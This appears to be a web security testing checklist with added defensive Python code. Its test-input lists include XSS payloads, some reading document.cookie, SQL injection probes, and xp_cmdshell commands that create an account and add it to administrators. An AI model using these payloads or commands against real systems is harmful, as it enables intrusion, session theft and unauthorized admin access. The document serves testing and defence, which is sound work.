Common Security Test Cases

Source: Internet
Author: User

Establish an overall threat model, then test for overflow vulnerabilities, information leakage, error handling, SQL injection, authentication, and authorization errors.

1. Input verification

Check that validation is enforced on the server, not only in the client (test with script debugging disabled and cookies disabled).

1. Enter a very large number (such as 4,294,967,269) and a very small number (a negative number).

2. If the length of the input text is limited, try to exceed the limit. What happens when the limit is reached?

3. Enter special characters, such as: ~!@#$%^&*()_+<>:"{}|

4. Enter full-width (Chinese) and ASCII spaces: a string that contains spaces, and spaces at the beginning and end.

5. Enter the special strings NULL, null, 0x0d 0x0a (CR/LF).

6. Enter a normal string.

7. Enter a different type of value from the one required. For example, if a number is required, check positive values, negative values, zero (positive and negative), decimals, letters, and null values; if a letter is required, check what happens when a number is entered.

8. Enter HTML and JavaScript code.

9. For a displayed count that must be correct (for example, the number of answers to a question), check not only the count shown on the question's final page, but also that it changes correctly after answers are added or deleted.

For example:

1. Enter

2. Enter <input type="text" name="user"/> to check whether a text box appears;

3. Enter <script type="text/javascript">alert("prompt")</script> to check whether an alert is displayed.
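The checklist items above describe inputs; the server-side validator that should reject them is not on the page. The following is an added example (not from the original), with assumed field limits (32-bit integers, a 32-character name): it treats the full-width CJK space U+3000 like an ASCII space, refuses NUL/CR/LF and markup characters, and runs a constructed set of the checklist inputs through both validators so the outcome of each is visible.

```python
import re
import unicodedata

# Assumed limits for an example form; the page does not specify them.
INT32_MIN, INT32_MAX = -2_147_483_648, 2_147_483_647
MAX_NAME_LEN = 32

# Bytes that must never reach a back-end from a text field: NUL, LF, CR.
CONTROL_CHARS = re.compile(r"[\x00\x0a\x0d]")
# Treat the full-width (CJK) space U+3000 like an ASCII space when trimming.
SPACES = " \t\u3000"


class ValidationError(ValueError):
    """Raised with a short reason when a field is rejected."""


def validate_int(raw):
    """Accept a decimal integer in 32-bit range; reject letters, decimals, NULL and empty input."""
    if raw is None:
        raise ValidationError("value required")
    s = raw.strip(SPACES)
    if s == "" or s.upper() == "NULL":
        raise ValidationError("value required")
    if not re.fullmatch(r"[+-]?\d+", s):
        raise ValidationError("not an integer")
    n = int(s)
    if not INT32_MIN <= n <= INT32_MAX:
        raise ValidationError("out of range")
    return n


def validate_name(raw):
    """Accept a short display name: trim surrounding spaces, refuse control and markup characters."""
    if raw is None:
        raise ValidationError("value required")
    if CONTROL_CHARS.search(raw):
        raise ValidationError("control characters not allowed")
    s = unicodedata.normalize("NFC", raw.strip(SPACES))
    if not s or s.upper() == "NULL":
        raise ValidationError("value required")
    if len(s) > MAX_NAME_LEN:
        raise ValidationError("too long")
    if re.search(r"[<>\"'&]", s):
        raise ValidationError("markup characters not allowed")
    return s


def check(validator, value):
    """Run one checklist input through a validator and report ('accepted', result) or ('rejected', reason)."""
    try:
        return ("accepted", validator(value))
    except ValidationError as exc:
        return ("rejected", str(exc))


# Constructed checklist inputs mirroring the items above (not the page's own data).
INT_CASES = ["4294967269", "-1", "0", "-0", "1.5", "abc", "NULL", "", "\u30001\u3000"]
NAME_CASES = ["  Alice  ", "\u3000Alice", "a\x00b", "a\x0d\x0ab", "<script>", "x" * 33, "用户", "null"]


def run_checklist():
    """Return {field: {input: outcome}} so a tester can see which inputs were rejected and why."""
    return {
        "int": {v: check(validate_int, v) for v in INT_CASES},
        "name": {v: check(validate_name, v) for v in NAME_CASES},
    }


if __name__ == "__main__":
    for field, results in run_checklist().items():
        for value, outcome in results.items():
            print(f"{field:5} {value!r:22} -> {outcome}")
```

Negative numbers are accepted by validate_int because the range check, not the sign, decides; a field that must be positive would add its own bound on top.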

About upload:

1. Is the file format restricted, and can an exe file be uploaded?

2. Is the file size limited? Does uploading a very large file cause an exception or error? Does uploading a 0 KB file, or a file that does not exist, cause an exception?

3. Can the format restriction be bypassed by changing the extension, or by packing the file into an archive?

4. Is there a limit on total upload space? For example, if a large file that exceeds the size limit is split and uploaded in parts, does an exception occur?

5. If the uploaded file is larger than the remaining local space, does an exception occur?

6. Is success reported correctly? Interrupt the upload midway and check whether it is still reported as successful.

7. Upload files whose names contain Chinese characters and special characters.

Download:

  1. Check that path traversal input such as ..\ in the requested path cannot reach files outside the web directory.
  2. Modify the file name suffix (extension) in the download request.
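The upload and download checks above are tests; the server-side handling they test for is not shown on the page. The following is an added example (not from the original) with an assumed 5 MB limit and an assumed allowlist of three image types: the uploaded name is reduced to a bare file name (Chinese characters stay, path separators and quotes go), the extension is checked against the allowlist, the size is bounded in both directions, and the file's leading bytes must match its extension so a renamed exe is refused. For downloads, the requested path is resolved against the download root and rejected if it resolves outside it.

```python
import os
import re
import unicodedata
from pathlib import Path

MAX_UPLOAD_BYTES = 5 * 1024 * 1024  # assumed limit; the page names none

# Allowlist of extensions with the leading bytes a genuine file of that type must carry.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


class UploadRejected(ValueError):
    pass


def safe_filename(name):
    """Reduce a client-supplied name to a bare file name with no path or shell-significant characters."""
    base = re.split(r"[\\/]", name)[-1]          # drop any ../ or ..\ directory part
    base = unicodedata.normalize("NFC", base)
    # keep letters and digits from any script (Chinese names stay readable), plus . _ -
    base = "".join(ch for ch in base if ch.isalnum() or ch in "._-")
    base = base.lstrip(".")                       # no dot-files, no name that is only an extension
    if not base or "." not in base:
        raise UploadRejected("invalid file name")
    return base


def validate_upload(name, data):
    """Apply the upload checks: name, extension allowlist, size bounds, content matches extension."""
    fname = safe_filename(name)
    ext = os.path.splitext(fname)[1].lower()
    if ext not in ALLOWED_TYPES:
        raise UploadRejected("file type not allowed")
    if len(data) == 0:
        raise UploadRejected("empty file")
    if len(data) > MAX_UPLOAD_BYTES:
        raise UploadRejected("file too large")
    if not data.startswith(ALLOWED_TYPES[ext]):
        # an .exe renamed to .jpg fails here: the extension passed, the bytes are not a JPEG
        raise UploadRejected("content does not match extension")
    return fname


def upload_outcome(name, data):
    """('accepted', stored name) or ('rejected', reason), for running the checklist cases."""
    try:
        return ("accepted", validate_upload(name, data))
    except UploadRejected as exc:
        return ("rejected", str(exc))


def resolve_download(root, requested):
    """Map a requested download path onto the download root; refuse anything that escapes it."""
    root_path = Path(root).resolve()
    target = (root_path / requested).resolve()   # an absolute or ../ path resolves outside root
    if root_path not in target.parents:
        raise PermissionError("path escapes download root")
    return target


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16     # constructed minimal PNG header
    print(upload_outcome("../../photo 2007.png", png))
    print(upload_outcome("tool.jpg", b"MZ\x90\x00"))
    print(resolve_download("/srv/files", "docs/a.pdf"))
```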

About URL:

1. Can pages that should be available only after logon, or only to special users, be reached by entering the address directly?

2. If a URL parameter is maliciously modified (a number replaced by a letter, a very large number, or special characters), does the page open incorrectly or allow illegal access to other pages?

3. If a URL such as a search page carries keywords, enter HTML or JavaScript code in the URL and check whether it is displayed or executed on the page.

4. Enter benign, ordinary characters as a control case.
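Items 1 and 2 test whether authorization and parameter checks happen on the server for every direct request. The following is an added example (not from the original) of that server-side check with an assumed route table (/admin/ for administrators, /account/ for logged-in users, everything else public): the required role is looked up per request, a missing login redirects, an insufficient role is refused, and an id parameter that is not a bounded positive integer is rejected before any lookup.

```python
import re

# Assumed route table for an example site: (path prefix, role required); None means public.
# More specific prefixes come first so the first match is the most specific rule.
ROUTES = [
    ("/admin/", "admin"),
    ("/account/", "user"),
    ("/", None),
]
ROLE_RANK = {None: 0, "user": 1, "admin": 2}


def required_role(path):
    """Role needed for a path; anything outside the table is treated as most restricted."""
    for prefix, role in ROUTES:
        if path.startswith(prefix):
            return role
    return "admin"


def parse_numeric_id(raw, upper=2**31 - 1):
    """A URL parameter that must be a positive integer: letters, quotes, tags and huge values yield None."""
    if raw is None or not re.fullmatch(r"\d{1,10}", raw):
        return None
    n = int(raw)
    return n if 1 <= n <= upper else None


def handle(session, path, params):
    """Return (status, message) for a direct request; the checks run on the server for every request."""
    role = session.get("role")          # None when the browser is not logged in
    need = required_role(path)
    if need is not None and role is None:
        return 302, "redirect to login"  # item 1: direct address entry does not skip logon
    if ROLE_RANK.get(role, 0) < ROLE_RANK.get(need, 0):
        return 403, "forbidden"          # item 1: logged in, but not the special user
    if "id" in params:
        item_id = parse_numeric_id(params["id"])
        if item_id is None:
            return 400, "bad id"         # item 2: letters, huge numbers, special characters
        return 200, f"{path} item {item_id}"
    return 200, path


if __name__ == "__main__":
    print(handle({}, "/account/orders", {"id": "5"}))
    print(handle({"role": "user"}, "/admin/users", {}))
    print(handle({"role": "user"}, "/account/orders", {"id": "5' or 1=1"}))
```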

UBB:

[url=http://www.*****.com]Your website[/url]

1. Try entering UBB code in various ways, such as incomplete code and code nesting.

2. Add attributes such as styles and events to the UBB code to check whether they work.

3. Enter the UBB code that does not exist in the editor to check whether it works.

[url=javascript:alert('hello')]link[/url]

[email=javascript:alert('hello')]EMail[/email]

[email=yangtao@rising.com.cn STYLE="background-image:url(javascript:alert('xss')"]yangtao@rising.com.cn[/email]

[img]http://www.13fun.cn/2007713015578593_03.jpg style="background-image:url(javascript:alert('alert(xss)')"[/img]

[img]http://www.13fun.cn/photo/2007-7/2007713015578593_03.jpg" onmouseover=alert('hello');"[/img]

[b STYLE="background-image:url(javascript:alert('xsss')"]Slice service network[/b]

[i STYLE="background-image:url(javascript:alert('xsss')"]Beijing[/i]

[u]August 5, 1234 Beijing[/u]

[font=" STYLE="background-image:url(javascript:alert('xsss')"]Beijing[/font]

[size=4" STYLE="background-image:url(javascript:alert('xss')"]May Beijing[/size]

[color=Red" STYLE="background-image:url(javascript:alert('xsss')"]May Beijing[/color]

[align=center" STYLE="background-image:url(javascript:alert('xsss')"]Beijing[/align]

[float=left" STYLE="background-image:url(javascript:alert('xsss')"]Beijing[/float]

[font=STYLE="background-image:url(javascript:alert('xsss')"]Beijing[/font]

[size=4 STYLE="background-image:url(javascript:alert('xss')"]May Beijing[/size]

[color=Red STYLE="background-image:url(javascript:alert('xsss')"]Beijing[/color]

[align=center STYLE="background-image:url(javascript:alert('xss')"]Beijing[/align]

[list=1]

[*]May, Beijing[/list]

[indent]August 5, 1234 Beijing[/indent]

[float=left STYLE="background-image:url(javascript:alert('xss')"]Beijing[/float]

[media=ra,400,300,0]http://bbsforblog.ikaka.com/posttopic.aspx?Forumid=109[/media]
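The UBB test cases above all rely on the editor passing a tag argument through to an HTML attribute or accepting a javascript: URL. The following is an added example (not from the original) of a small UBB renderer written to refuse them: it knows only [b], [i], [u], [url=...] and [img]...[/img] (the [email], [font], [size], [media] and other tags from the list are assumed unsupported and are shown as literal text), allows only http(s) URLs whose argument contains no whitespace, quotes or brackets, HTML-escapes everything else, and closes tags left open so incomplete or wrongly nested code cannot break the surrounding page.

```python
import html
import re
from urllib.parse import urlsplit

# Tags this example renderer understands; every other [tag] is shown as literal text.
SIMPLE_TAGS = {"b": "strong", "i": "em", "u": "u"}
ALLOWED_SCHEMES = {"http", "https"}
# [tag], [tag=argument] or [/tag]; the argument may not contain ']'
TAG_RE = re.compile(r"\[(/?)([a-zA-Z]+)(?:=([^\]]*))?\]")


def safe_url(raw):
    """Return the URL if it is a plain http(s) URL, else None.
    Whitespace, quotes or angle brackets in the argument mean an attempt to add attributes."""
    candidate = raw.strip()
    if re.search(r"""[\s"'<>\[\]]""", candidate):
        return None
    parts = urlsplit(candidate)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return candidate


def render_ubb(text):
    out, stack, pos = [], [], 0
    for m in TAG_RE.finditer(text):
        if m.start() < pos:             # token already consumed as [img] content
            continue
        out.append(html.escape(text[pos:m.start()]))
        pos = m.end()
        closing, name, arg = m.group(1) == "/", m.group(2).lower(), m.group(3)
        literal = html.escape(m.group(0))   # emitted whenever the tag is not accepted
        if name in SIMPLE_TAGS:
            if not closing and arg is None:      # [b=anything] is refused: no attributes
                stack.append(name)
                out.append(f"<{SIMPLE_TAGS[name]}>")
            elif closing and stack and stack[-1] == name:
                stack.pop()
                out.append(f"</{SIMPLE_TAGS[name]}>")
            else:
                out.append(literal)
        elif name == "url":
            url = safe_url(arg) if (not closing and arg is not None) else None
            if url:
                stack.append(name)
                out.append(f'<a href="{html.escape(url)}">')
            elif closing and stack and stack[-1] == "url":
                stack.pop()
                out.append("</a>")
            else:
                out.append(literal)
        elif name == "img" and not closing:
            end = text.lower().find("[/img]", pos)
            src = safe_url(text[pos:end]) if end != -1 else None
            if src:
                out.append(f'<img src="{html.escape(src)}" alt="">')
                pos = end + len("[/img]")
            else:
                out.append(literal)
        else:
            out.append(literal)
    out.append(html.escape(text[pos:]))
    while stack:                        # close tags left open so the page structure survives
        name = stack.pop()
        out.append("</a>" if name == "url" else f"</{SIMPLE_TAGS[name]}>")
    return "".join(out)


if __name__ == "__main__":
    print(render_ubb("[url=http://www.example.com]Your website[/url]"))
    print(render_ubb("[url=javascript:alert('hello')]link[/url]"))
    print(render_ubb("[b STYLE=\"background-image:url(javascript:alert('xsss')\"]Beijing[/b]"))
```

Note that [b STYLE="..."] never reaches the tag handler at all: the tag pattern accepts only a name followed by = or ], so the whole bracket is escaped as text, which is the behaviour the checklist item about attributes is looking for.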

Output Encoding

Common test input strings include:

<input type="text"/>

<input/>

<input/

<script>alert('hello');</script>

1.jpg" onmouseover="alert('xsss')

"></a><script>alert('xss');</script>

http://xxx'; alert('xss'); var/a='a

'">xss&<

a="\"; b="; alert(/xss/);//"

0" alt="logo"/>

"'"

'"'

""

""

"

"'"

title=""

Compare the rendered output with what was entered to see whether the string was encoded, reflected unchanged, or executed.

Prevent SQL Injection

admin --

' or --

' and () exec insert * % chr mid

and 1=1; And 1=1; aNd 1=1; char(97)char(110)char(100)char(49)char(61)char(49); %20AND%201=2

' and 1=1; ' And 1=1; ' aNd 1=1;

and 1=2; ' and 1=2

and 2=2

and user>0

and (select count(*) from sysobjects)>0

and (select count(*) from msysobjects)>0

and (select count(*) from Admin)>=0

and (select top 1 len(username) from Admin)>0 (username is a known field)

; exec master..xp_cmdshell "net user name password /add"--

; exec master..xp_cmdshell "net localgroup name administrators /add"--

and 0<>(select count(*) from admin)

A simple encoding example: in where xtype='u', the ASCII code of the character U is 85, so it can be written as where xtype=char(85). For Chinese characters, where name='user' (the Chinese word for user) can be written as where name=nchar(29992)+nchar(25143).
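The strings above are the probes; the defect they detect is SQL built by string concatenation, and the fix is a parameterized query. The following is an added example (not from the original) using an in-memory SQLite table constructed to stand in for the Admin table: the vulnerable login lets ' or 1=1-- return every row and lets the and 1=1 / and 1=2 pair reveal a true/false difference, while the parameterized login returns nothing for either. It also includes a request-log triage regex for the probe family listed above (case variants, %20 encoding, char() encoding, xp_cmdshell, sysobjects) run over constructed access-log lines; a match is a reason to investigate, not proof of compromise.

```python
import re
import sqlite3
from urllib.parse import unquote


def make_db():
    """Constructed in-memory table standing in for the Admin table the probes above enumerate."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO admin VALUES (?, ?)", [("alice", "pw1"), ("bob", "pw2")])
    return conn


def login_vulnerable(conn, username, password):
    """The anti-pattern: a quote in the input closes the literal and the rest is executed as SQL."""
    sql = ("SELECT username FROM admin WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, username, password):
    """The fix: the driver sends values separately, so quotes and 'and 1=1' stay plain data."""
    sql = "SELECT username FROM admin WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


# Request-log triage for the probe strings listed above, after URL-decoding.
PROBE_RE = re.compile(
    r"\b(?:and|or)\b\s*\d+\s*=\s*\d+"      # and 1=1 / aNd 1=2 / %20AND%201=2
    r"|\bchar\s*\(\s*\d+\s*\)"             # char(97)char(110)char(100)...
    r"|xp_cmdshell|\bm?sysobjects\b",      # stored-procedure and catalogue probes
    re.IGNORECASE,
)


def looks_like_sqli_probe(request_uri):
    return PROBE_RE.search(unquote(request_uri)) is not None


def triage(log_lines):
    """Return the request URIs from 'METHOD URI PROTOCOL' log lines that match a known probe."""
    flagged = []
    for line in log_lines:
        parts = line.split()
        if len(parts) >= 2 and looks_like_sqli_probe(parts[1]):
            flagged.append(parts[1])
    return flagged


# Constructed access-log lines; not from any real server.
SAMPLE_LOG = [
    "GET /item.asp?id=5 HTTP/1.1",
    "GET /item.asp?id=5%20and%201=1 HTTP/1.1",
    "GET /item.asp?id=5%20AND%201=2 HTTP/1.1",
    "GET /item.asp?id=5%20and%20char(97)char(110)char(100) HTTP/1.1",
    "GET /search.asp?q=sandwich%20order HTTP/1.1",
    "GET /item.asp?id=5;exec%20master..xp_cmdshell HTTP/1.1",
]


if __name__ == "__main__":
    conn = make_db()
    probe = "alice' or 1=1--"
    print("vulnerable:   ", login_vulnerable(conn, probe, "x"))
    print("parameterized:", login_parameterized(conn, probe, "x"))
    print("flagged:      ", triage(SAMPLE_LOG))
```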

Cross-site Scripting (XSS)

For XSS, check the HTML output and find where your input ends up. Is it inside an HREF attribute? Inside an IFRAME tag? Inside a CLSID (object) tag? In an img src? Is it the param name of some Flash content? The context decides which characters must be encoded.

★ ~!@#$%^&*()_+<>,./?;'"[]{}\-

★ %3Cinput/%3E

★ %3Cscript%3Ealert('xss')%3C/script%3E

★ <input type="text"/>

★ <input/>

★ <input/

★ <script>alert('xss')</script>

★ <script>alert('xss');</script>

★ </script><script>alert('xss')</script>

★ javascript:alert(/xss/)

★ javascrip&#116&#58 alert(/xss/)

★ ='><script>alert(document.cookie)</script>

★ 1.jpg" onmouseover="alert('xsss')

★ "></a><script>alert('xss');</script>

★ http://xxx'; alert('xss'); var/a='a

★ '">xss&<

★ "onmouseover=alert('hello');"

★ &{alert('hello');}

★ >"'><script>alert('xsss')</script>

★ >%22%27>

★ >"'>6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>

★ AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27)%22%20OS%22

★ %22%2Balert(%27XSS%27)%2B%22

★ <table background="javascript:alert([code])"></table>

★ <object type=text/html data="javascript:alert([code]);"></object>

★ <body onload="javascript:alert([code])"></body>

★ a?<script>alert('vulnerable')</script>

★ <!--'">&:

A template value placed inside a JavaScript string, and the script that results when the value carries its own quote and code:

var from = '$!rundata.parameters.getString('from')';

var from = "; hackerFunction(document.cookie);";

http://searchbox.mapbar.com/publish/template/template1010?cid=qingke&tid=tid1010&cityName=Tianjin<script>alert("hello")</script>&nid=mapbxitbjrqmywjrx1_x
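The Output Encoding list and the XSS list above both come down to one question: for each place the input lands (text, attribute, href/src, JavaScript string), is the right encoder applied? The following is an added example (not from the original, covering both sections) that puts one untrusted value into those four contexts with a context-specific encoder: HTML entity escaping for text and attributes, a JSON literal with < > & additionally escaped for the script-string case so </script> cannot end the block, and a scheme allowlist for URL attributes so javascript: becomes a dead link. A constructed set of the probes from the lists above is rendered and checked for any fragment surviving in executable form; the page layout and the marker strings are assumptions of the example.

```python
import html
import json
from urllib.parse import urlsplit

ALLOWED_HREF_SCHEMES = {"http", "https", "mailto"}


def encode_html(value):
    """For text nodes and quoted attribute values: < > & " ' become entities."""
    return html.escape(value, quote=True)


def encode_js_string(value):
    """For a value inside a <script> string literal: a quoted JSON literal, with < > &
    additionally escaped so a '</script>' in the value cannot terminate the script block."""
    literal = json.dumps(value)  # ensure_ascii also escapes the U+2028/2029 line terminators
    return literal.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def safe_href(value):
    """For href/src/background: only http(s)/mailto URLs or site-relative paths; otherwise a dead link."""
    url = value.strip()
    parts = urlsplit(url)
    if parts.scheme:
        return url if parts.scheme.lower() in ALLOWED_HREF_SCHEMES else "#"
    if url.startswith("/") and not url.startswith("//"):   # no protocol-relative //host
        return url
    return "#"


def render_page(user_input):
    """Put one untrusted value into four contexts, each with the encoder that fits it."""
    return (
        "<p>You searched for: {text}</p>\n"
        '<img src="{src}" alt="{alt}">\n'
        '<a href="{href}">link</a>\n'
        "<script>var from = {js};</script>"
    ).format(
        text=encode_html(user_input),
        src=encode_html(safe_href(user_input)),    # URL check first, then attribute encoding
        alt=encode_html(user_input),
        href=encode_html(safe_href(user_input)),
        js=encode_js_string(user_input),
    )


# Fragments that, if present verbatim, mean a probe survived in executable form (assumed markers).
LIVE_MARKERS = ("<script>alert", 'onmouseover="alert', 'href="javascript:',
                'src="javascript:', "</script><script>")


def page_is_clean(page):
    lowered = page.lower()
    return not any(marker in lowered for marker in LIVE_MARKERS)


# Constructed probes taken from the lists above.
PROBES = [
    "<script>alert('xss')</script>",
    "</script><script>alert('xss')</script>",
    "javascript:alert(/xss/)",
    "Javascrip&#116&#58 alert(/xss/)",
    "1.jpg\" onmouseover=\"alert('xsss')",
    "\"></a><script>alert('xss');</script>",
    "'\">xss&<",
    "\"; hackerFunction(document.cookie);\"",
    "&{alert('hello');}",
    "<body onload=\"javascript:alert([code])\"></body>",
]


if __name__ == "__main__":
    for probe in PROBES:
        print("clean" if page_is_clean(render_page(probe)) else "LIVE ", repr(probe))
    print(render_page(PROBES[7]))
```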

Cross-Site Request Forgery (CSRF)

If two pages are open in the same browser and the session of one page is invalidated (for example, it logs out), can operations on the other page still succeed?

When the page has no check code (captcha), inspect the page source for an anti-CSRF token. If the form renders completely and no token field is present, requests from it are not protected against forgery.
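The two checks above look for a hidden token in the form and for requests that outlive their session. The following is an added example (not from the original) of the server side that passes both: the token is an HMAC over the session id and a nonce under an assumed placeholder server secret, so a token issued to another session or altered by one character fails verification; the transfer handler first confirms the session is still active (the logged-out page loses), then requires a valid token (a cross-site form post carries the cookie but has no token). The form rendering shows the hidden field a tester looks for in the page source.

```python
import hashlib
import hmac
import secrets

SECRET_KEY = b"replace-with-a-random-server-secret"   # placeholder; load from config in a real app
ACTIVE_SESSIONS = {}   # session id -> username; stands in for the server-side session store


def login(username):
    sid = secrets.token_urlsafe(16)
    ACTIVE_SESSIONS[sid] = username
    return sid


def logout(sid):
    ACTIVE_SESSIONS.pop(sid, None)


def issue_csrf_token(sid):
    """token = nonce.HMAC(secret, sid:nonce): proves the form was issued for this very session."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SECRET_KEY, f"{sid}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(sid, token):
    if not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SECRET_KEY, f"{sid}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)   # constant-time comparison


def render_transfer_form(sid):
    """What a tester looks for in the page source: a hidden token field inside the form."""
    token = issue_csrf_token(sid)
    return (
        '<form method="post" action="/transfer">\n'
        f'  <input type="hidden" name="csrf_token" value="{token}">\n'
        '  <input name="amount"><button>Send</button>\n'
        "</form>"
    )


def handle_transfer(cookies, form):
    """Server side of POST /transfer; cookies and form are dicts standing in for the request."""
    sid = cookies.get("session")
    if sid not in ACTIVE_SESSIONS:
        return 401, "not logged in"        # the other page after this session logged out
    if not verify_csrf_token(sid, form.get("csrf_token")):
        return 403, "missing or foreign csrf token"   # forged post: cookie present, token absent
    return 200, f"transferred {form.get('amount')} for {ACTIVE_SESSIONS[sid]}"


if __name__ == "__main__":
    sid = login("alice")
    page = render_transfer_form(sid)
    token = page.split('value="')[1].split('"')[0]
    print(handle_transfer({"session": sid}, {"csrf_token": token, "amount": "10"}))
    print(handle_transfer({"session": sid}, {"amount": "10"}))
    logout(sid)
    print(handle_transfer({"session": sid}, {"csrf_token": token, "amount": "10"}))
```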
